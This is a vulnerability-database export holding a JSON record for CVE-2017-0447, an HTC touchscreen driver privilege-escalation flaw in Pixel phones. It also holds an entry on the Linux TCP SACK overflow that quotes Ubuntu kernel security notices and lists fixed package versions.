An elevation of privilege vulnerability in the HTC touchscreen driver could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as High because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.18. Android ID: A-32919560. GooglePixel & PixelXL is Google's new Android smartphone launched on October 4, 2016, taking over the previous Nexus series. Google Pixel/Pixel XL is prone to multiple privilege-escalation vulnerabilities. These issues are being tracked by Android Bug IDs A-32769717, A-32917445 and A-32919560

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201702-0762",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "linux",
        "version": "3.18"
      },
      {
        "model": "android",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "google",
        "version": "7.1.1"
      },
      {
        "model": "android",
        "scope": null,
        "trust": 0.8,
        "vendor": "google",
        "version": null
      },
      {
        "model": "android",
        "scope": "lte",
        "trust": 0.6,
        "vendor": "google",
        "version": "\u003c=7.1.1"
      },
      {
        "model": "android",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "google",
        "version": "7.1.1"
      },
      {
        "model": "pixel xl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "pixel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01364"
      },
      {
        "db": "BID",
        "id": "96054"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001496"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0447"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-288"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:google:android:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "7.1.1",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-0447"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Jianqiang Zhao ( @jianqiangzhao) and pjf of IceSword Lab, Qihoo 360, and Gengjia Chen (@chengjia4574) and pjf of IceSword Lab, Qihoo 360 Technology Co. Ltd.",
    "sources": [
      {
        "db": "BID",
        "id": "96054"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2017-0447",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.6,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 4.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "High",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.6,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2017-0447",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.6,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 4.9,
            "id": "CNVD-2017-01364",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.0,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.0,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.0,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2017-0447",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-0447",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-01364",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201702-288",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2017-0447",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01364"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0447"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001496"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0447"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-288"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An elevation of privilege vulnerability in the HTC touchscreen driver could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as High because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.18. Android ID: A-32919560. GooglePixel \u0026 PixelXL is Google\u0027s new Android smartphone launched on October 4, 2016, taking over the previous Nexus series. Google Pixel/Pixel XL is prone to multiple privilege-escalation vulnerabilities. \nThese issues are being   tracked by Android Bug IDs A-32769717, A-32917445 and A-32919560",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-0447"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001496"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-01364"
      },
      {
        "db": "BID",
        "id": "96054"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0447"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-0447",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "96054",
        "trust": 2.0
      },
      {
        "db": "SECTRACK",
        "id": "1037798",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001496",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-01364",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-288",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0447",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01364"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0447"
      },
      {
        "db": "BID",
        "id": "96054"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001496"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0447"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-288"
      }
    ]
  },
  "id": "VAR-201702-0762",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01364"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01364"
      }
    ]
  },
  "last_update_date": "2023-12-18T11:27:12.142000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Android Security Bulletin-February 2017",
        "trust": 0.8,
        "url": "https://source.android.com/security/bulletin/2017-02-01.html"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org/"
      },
      {
        "title": "Patch for GooglePixel/PixelXLHTC Touchscreen Drive Privilege Escalation Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/89303"
      },
      {
        "title": "Android HTC touchscreen Fixes for driver permission and access control vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=67572"
      },
      {
        "title": "Android Security Bulletins: Android Security Bulletin\u2014February 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=android_security_bulletins\u0026qid=861656f01e3e18209f39ad844e9ee35d"
      },
      {
        "title": "CVE-Study",
        "trust": 0.1,
        "url": "https://github.com/thdusdl1219/cve-study "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01364"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0447"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001496"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-288"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-noinfo",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-264",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001496"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0447"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.7,
        "url": "https://source.android.com/security/bulletin/2017-02-01.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/96054"
      },
      {
        "trust": 1.7,
        "url": "http://www.securitytracker.com/id/1037798"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-0447"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2017-0447"
      },
      {
        "trust": 0.3,
        "url": "http://code.google.com/android/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01364"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0447"
      },
      {
        "db": "BID",
        "id": "96054"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001496"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0447"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-288"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01364"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0447"
      },
      {
        "db": "BID",
        "id": "96054"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001496"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0447"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-288"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-02-15T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-01364"
      },
      {
        "date": "2017-02-08T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-0447"
      },
      {
        "date": "2017-02-06T00:00:00",
        "db": "BID",
        "id": "96054"
      },
      {
        "date": "2017-02-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-001496"
      },
      {
        "date": "2017-02-08T15:59:01.927000",
        "db": "NVD",
        "id": "CVE-2017-0447"
      },
      {
        "date": "2017-02-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201702-288"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-02-15T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-01364"
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-0447"
      },
      {
        "date": "2017-03-07T04:01:00",
        "db": "BID",
        "id": "96054"
      },
      {
        "date": "2017-02-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-001496"
      },
      {
        "date": "2019-10-03T00:03:26.223000",
        "db": "NVD",
        "id": "CVE-2017-0447"
      },
      {
        "date": "2019-10-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201702-288"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-288"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "HTC Elevated privilege vulnerability in touch screen driver",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001496"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control issues",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-288"
      }
    ],
    "trust": 0.6
  }
}

var-201906-1175
Vulnerability from variot

Jonathan Looney discovered that the TCP_SKB_CB(skb)->tcp_gso_segs value was subject to an integer overflow in the Linux kernel when handling TCP Selective Acknowledgments (SACKs). A remote attacker could use this to cause a denial of service. This has been fixed in stable kernel releases 4.4.182, 4.9.182, 4.14.127, 4.19.52, 5.1.11, and is fixed in commit 3b4929f65b0d8249f19a50245cd88ed1a2f78cff. Multiple TCP Selective Acknowledgement (SACK) and Maximum Segment Size (MSS) networking vulnerabilities may cause denial-of-service conditions in Linux and FreeBSD kernels. A successful exploit could cause the targeted system to crash, resulting in a DoS condition. Proof-of-concept (PoC) code that demonstrates an exploit of this vulnerability is publicly available. Kernel.org has confirmed the vulnerability and released software updates. ========================================================================== Kernel Live Patch Security Notice 0058-1 October 22, 2019

linux vulnerability

A security issue affects these releases of Ubuntu:

| Series | Base kernel | Arch | flavors | |------------------+--------------+----------+------------------| | Ubuntu 18.04 LTS | 4.15.0 | amd64 | aws | | Ubuntu 18.04 LTS | 4.15.0 | amd64 | generic | | Ubuntu 18.04 LTS | 4.15.0 | amd64 | lowlatency | | Ubuntu 18.04 LTS | 4.15.0 | amd64 | oem | | Ubuntu 18.04 LTS | 5.0.0 | amd64 | azure | | Ubuntu 14.04 LTS | 4.4.0 | amd64 | generic | | Ubuntu 14.04 LTS | 4.4.0 | amd64 | lowlatency | | Ubuntu 16.04 LTS | 4.4.0 | amd64 | aws | | Ubuntu 16.04 LTS | 4.4.0 | amd64 | generic | | Ubuntu 16.04 LTS | 4.4.0 | amd64 | lowlatency | | Ubuntu 16.04 LTS | 4.15.0 | amd64 | azure | | Ubuntu 16.04 LTS | 4.15.0 | amd64 | generic | | Ubuntu 16.04 LTS | 4.15.0 | amd64 | lowlatency |

Summary:

Several security issues were fixed in the kernel.

Software Description: - linux: Linux kernel

Details:

It was discovered that a race condition existed in the GFS2 file system in the Linux kernel. (CVE-2016-10905)

It was discovered that a use-after-free error existed in the block layer subsystem of the Linux kernel when certain failure conditions occurred. (CVE-2018-20856)

It was discovered that the USB gadget Midi driver in the Linux kernel contained a double-free vulnerability when handling certain error conditions. (CVE-2018-20961)

It was discovered that the XFS file system in the Linux kernel did not properly handle mount failures in some situations. (CVE-2018-20976)

It was discovered that the RSI 91x Wi-Fi driver in the Linux kernel did not did not handle detach operations correctly, leading to a use-after-free vulnerability. (CVE-2018-21008)

It was discovered that the Intel Wi-Fi device driver in the Linux kernel did not properly validate certain Tunneled Direct Link Setup (TDLS). (CVE-2019-0136)

It was discovered that the Linux kernel on ARM processors allowed a tracing process to modify a syscall after a seccomp decision had been made on that syscall. (CVE-2019-2181)

It was discovered that the Marvell Wireless LAN device driver in the Linux kernel did not properly validate the BSS descriptor. (CVE-2019-3846)

It was discovered that a heap buffer overflow existed in the Marvell Wireless LAN device driver for the Linux kernel. (CVE-2019-10126)

It was discovered that the Bluetooth UART implementation in the Linux kernel did not properly check for missing tty operations. (CVE-2019-11478)

It was discovered that the ext4 file system implementation in the Linux kernel did not properly zero out memory in some situations. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2019-11833)

It was discovered that the PowerPC dlpar implementation in the Linux kernel did not properly check for allocation errors in some situations. (CVE-2019-12614)

It was discovered that the floppy driver in the Linux kernel did not properly validate meta data, leading to a buffer overread. (CVE-2019-14283)

It was discovered that the floppy driver in the Linux kernel did not properly validate ioctl() calls, leading to a division-by-zero. (CVE-2019-14284)

Wen Huang discovered that the Marvell Wi-Fi device driver in the Linux kernel did not properly perform bounds checking, leading to a heap overflow. (CVE-2019-14814)

Wen Huang discovered that the Marvell Wi-Fi device driver in the Linux kernel did not properly perform bounds checking, leading to a heap overflow. (CVE-2019-14815)

Wen Huang discovered that the Marvell Wi-Fi device driver in the Linux kernel did not properly perform bounds checking, leading to a heap overflow. (CVE-2019-14816)

Matt Delco discovered that the KVM hypervisor implementation in the Linux kernel did not properly perform bounds checking when handling coalesced MMIO write operations. (CVE-2019-14821)

Peter Pi discovered a buffer overflow in the virtio network backend (vhost_net) implementation in the Linux kernel. (CVE-2019-14835)

Update instructions:

The problem can be corrected by updating your livepatches to the following versions:

| Kernel | Version | flavors | |--------------------------+----------+--------------------------| | 4.4.0-148.174 | 58.1 | lowlatency, generic | | 4.4.0-148.174~14.04.1 | 58.1 | lowlatency, generic | | 4.4.0-150.176 | 58.1 | generic, lowlatency | | 4.4.0-150.176~14.04.1 | 58.1 | lowlatency, generic | | 4.4.0-151.178 | 58.1 | lowlatency, generic | | 4.4.0-151.178~14.04.1 | 58.1 | generic, lowlatency | | 4.4.0-154.181 | 58.1 | lowlatency, generic | | 4.4.0-154.181~14.04.1 | 58.1 | generic, lowlatency | | 4.4.0-157.185 | 58.1 | lowlatency, generic | | 4.4.0-157.185~14.04.1 | 58.1 | generic, lowlatency | | 4.4.0-159.187 | 58.1 | lowlatency, generic | | 4.4.0-159.187~14.04.1 | 58.1 | generic, lowlatency | | 4.4.0-161.189 | 58.1 | lowlatency, generic | | 4.4.0-161.189~14.04.1 | 58.1 | lowlatency, generic | | 4.4.0-164.192 | 58.1 | lowlatency, generic | | 4.4.0-164.192~14.04.1 | 58.1 | lowlatency, generic | | 4.4.0-165.193 | 58.1 | generic, lowlatency | | 4.4.0-1083.93 | 58.1 | aws | | 4.4.0-1084.94 | 58.1 | aws | | 4.4.0-1085.96 | 58.1 | aws | | 4.4.0-1087.98 | 58.1 | aws | | 4.4.0-1088.99 | 58.1 | aws | | 4.4.0-1090.101 | 58.1 | aws | | 4.4.0-1092.103 | 58.1 | aws | | 4.4.0-1094.105 | 58.1 | aws | | 4.15.0-50.54 | 58.1 | generic, lowlatency | | 4.15.0-50.54~16.04.1 | 58.1 | generic, lowlatency | | 4.15.0-51.55 | 58.1 | generic, lowlatency | | 4.15.0-51.55~16.04.1 | 58.1 | generic, lowlatency | | 4.15.0-52.56 | 58.1 | lowlatency, generic | | 4.15.0-52.56~16.04.1 | 58.1 | generic, lowlatency | | 4.15.0-54.58 | 58.1 | generic, lowlatency | | 4.15.0-54.58~16.04.1 | 58.1 | generic, lowlatency | | 4.15.0-55.60 | 58.1 | generic, lowlatency | | 4.15.0-58.64 | 58.1 | generic, lowlatency | | 4.15.0-58.64~16.04.1 | 58.1 | lowlatency, generic | | 4.15.0-60.67 | 58.1 | lowlatency, generic | | 4.15.0-60.67~16.04.1 | 58.1 | generic, lowlatency | | 4.15.0-62.69 | 58.1 | generic, lowlatency | | 4.15.0-62.69~16.04.1 | 58.1 | lowlatency, generic | | 4.15.0-64.73 | 58.1 | generic, lowlatency | | 4.15.0-64.73~16.04.1 | 58.1 | lowlatency, generic | | 4.15.0-65.74 | 58.1 | lowlatency, generic | | 4.15.0-1038.43 | 58.1 | oem | | 4.15.0-1039.41 | 58.1 | aws | | 4.15.0-1039.44 | 58.1 | oem | | 4.15.0-1040.42 | 58.1 | aws | | 4.15.0-1041.43 | 58.1 | aws | | 4.15.0-1043.45 | 58.1 | aws | | 4.15.0-1043.48 | 58.1 | oem | | 4.15.0-1044.46 | 58.1 | aws | | 4.15.0-1045.47 | 58.1 | aws | | 4.15.0-1045.50 | 58.1 | oem | | 4.15.0-1047.49 | 58.1 | aws | | 4.15.0-1047.51 | 58.1 | azure | | 4.15.0-1048.50 | 58.1 | aws | | 4.15.0-1049.54 | 58.1 | azure | | 4.15.0-1050.52 | 58.1 | aws | | 4.15.0-1050.55 | 58.1 | azure | | 4.15.0-1050.57 | 58.1 | oem | | 4.15.0-1051.53 | 58.1 | aws | | 4.15.0-1051.56 | 58.1 | azure | | 4.15.0-1052.57 | 58.1 | azure | | 4.15.0-1055.60 | 58.1 | azure | | 4.15.0-1056.61 | 58.1 | azure | | 4.15.0-1056.65 | 58.1 | oem | | 4.15.0-1057.62 | 58.1 | azure | | 4.15.0-1057.66 | 58.1 | oem | | 4.15.0-1059.64 | 58.1 | azure | | 5.0.0-1014.14~18.04.1 | 58.1 | azure | | 5.0.0-1016.17~18.04.1 | 58.1 | azure | | 5.0.0-1018.19~18.04.1 | 58.1 | azure | | 5.0.0-1020.21~18.04.1 | 58.1 | azure |

Support Information:

Kernels older than the levels listed below do not receive livepatch updates. Please upgrade your kernel as soon as possible.

| Series | Version | Flavors | |------------------+------------------+--------------------------| | Ubuntu 18.04 LTS | 4.15.0-1039 | aws | | Ubuntu 16.04 LTS | 4.4.0-1083 | aws | | Ubuntu 18.04 LTS | 5.0.0-1000 | azure | | Ubuntu 16.04 LTS | 4.15.0-1047 | azure | | Ubuntu 18.04 LTS | 4.15.0-50 | generic lowlatency | | Ubuntu 16.04 LTS | 4.15.0-50 | generic lowlatency | | Ubuntu 14.04 LTS | 4.4.0-148 | generic lowlatency | | Ubuntu 18.04 LTS | 4.15.0-1038 | oem | | Ubuntu 16.04 LTS | 4.4.0-148 | generic lowlatency |

References: CVE-2016-10905, CVE-2018-20856, CVE-2018-20961, CVE-2018-20976, CVE-2018-21008, CVE-2019-0136, CVE-2019-2054, CVE-2019-2181, CVE-2019-3846, CVE-2019-10126, CVE-2019-10207, CVE-2019-11477, CVE-2019-11478, CVE-2019-11833, CVE-2019-12614, CVE-2019-14283, CVE-2019-14284, CVE-2019-14814, CVE-2019-14815, CVE-2019-14816, CVE-2019-14821, CVE-2019-14835

-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce . (CVE-2019-11477)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 19.04: linux-image-5.0.0-1008-aws 5.0.0-1008.8 linux-image-5.0.0-1008-gcp 5.0.0-1008.8 linux-image-5.0.0-1008-kvm 5.0.0-1008.8 linux-image-5.0.0-1010-raspi2 5.0.0-1010.10 linux-image-5.0.0-1014-snapdragon 5.0.0-1014.14 linux-image-5.0.0-17-generic 5.0.0-17.18 linux-image-5.0.0-17-generic-lpae 5.0.0-17.18 linux-image-5.0.0-17-lowlatency 5.0.0-17.18 linux-image-aws 5.0.0.1008.8 linux-image-gcp 5.0.0.1008.8 linux-image-generic 5.0.0.17.18 linux-image-generic-lpae 5.0.0.17.18 linux-image-gke 5.0.0.1008.8 linux-image-kvm 5.0.0.1008.8 linux-image-lowlatency 5.0.0.17.18 linux-image-raspi2 5.0.0.1010.7 linux-image-snapdragon 5.0.0.1014.7 linux-image-virtual 5.0.0.17.18

